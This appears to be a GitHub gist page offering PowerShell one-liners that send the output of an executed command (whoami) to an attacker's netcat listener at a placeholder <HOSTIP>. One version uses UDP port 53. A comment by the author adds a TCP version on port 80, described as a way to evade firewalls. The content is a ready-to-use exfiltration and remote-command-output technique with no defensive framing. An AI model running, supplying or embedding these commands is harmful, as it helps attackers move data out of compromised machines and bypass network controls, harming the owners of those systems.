Skip to content

Instantly share code, notes, and snippets.

@ignis-sec

ignis-sec/powershell-udp-rce-output.txt

Created July 11, 2020 19:51
Show Gist options
  • Star 16 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
  • Save ignis-sec/7a6121e4e75e34aa54cd1b2272a59683 to your computer and use it in GitHub Desktop.
Save ignis-sec/7a6121e4e75e34aa54cd1b2272a59683 to your computer and use it in GitHub Desktop.
Download ZIP
powershell command to return executed command output from 53/udp.
Raw
powershell-udp-rce-output.txt
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
@ignis-sec
Copy link
Author

ignis-sec commented Jul 11, 2020
edited

TCP version if you need to evade firewall with a connection on HTTP port:

powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"<HOSTIP>\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment